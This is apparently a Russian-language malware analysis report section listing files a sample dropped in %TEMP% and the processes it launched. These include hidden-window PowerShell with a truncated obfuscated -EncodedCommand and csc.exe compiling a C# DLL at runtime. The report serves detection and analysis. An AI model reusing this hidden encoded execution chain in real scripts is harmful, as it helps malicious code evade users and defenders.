Техническая информация
- %TEMP%\content\4856-5072-wscript.exe-15-52-54-467.dump
- %TEMP%\bkkb3tux\bkkb3tux.0.cs
- %TEMP%\bkkb3tux\bkkb3tux.cmdline
- %TEMP%\bkkb3tux\bkkb3tux.out
- %TEMP%\bkkb3tux\cscaab5da5b69d1469487188978365cb572.tmp
- %TEMP%\resf861.tmp
- %TEMP%\bkkb3tux\bkkb3tux.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBBAG4AcABhAHIAdABzAHIAZQAgAEkAbgBkAHUAIABJAG4AYwBvAG0AbQAgAEsAcgBhAGsAaQBsAGUAcgAgAEMAaABpAGsAYQBuAGUAcgAgAEMAYQBzAHAAYQByAG8AdABvAGcAIABVAG4AZABlAHIAbABhAGcAdABlACAASABhAHMA...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\bkkb3tux\bkkb3tux.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF861.tmp" "%TEMP%\bkkb3tux\CSCAAB5DA5B69D1469487188978365CB572.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBBAG4AcABhAHIAdABzAHIAZQAgAEkAbgBkAHUAIABJAG4AYwBvAG0AbQAgAEsAcgBhAGsAaQBsAGUAcgAgAEMAaABpAGsAYQBuAGUAcgAgAEMAYQBzAHAAYQByAG8AdABvAGcAIABVAG4AZABlAHIAbABhAGcAdABlACAASABhAHMA...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\bkkb3tux\bkkb3tux.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF861.tmp" "%TEMP%\bkkb3tux\CSCAAB5DA5B69D1469487188978365CB572.TMP"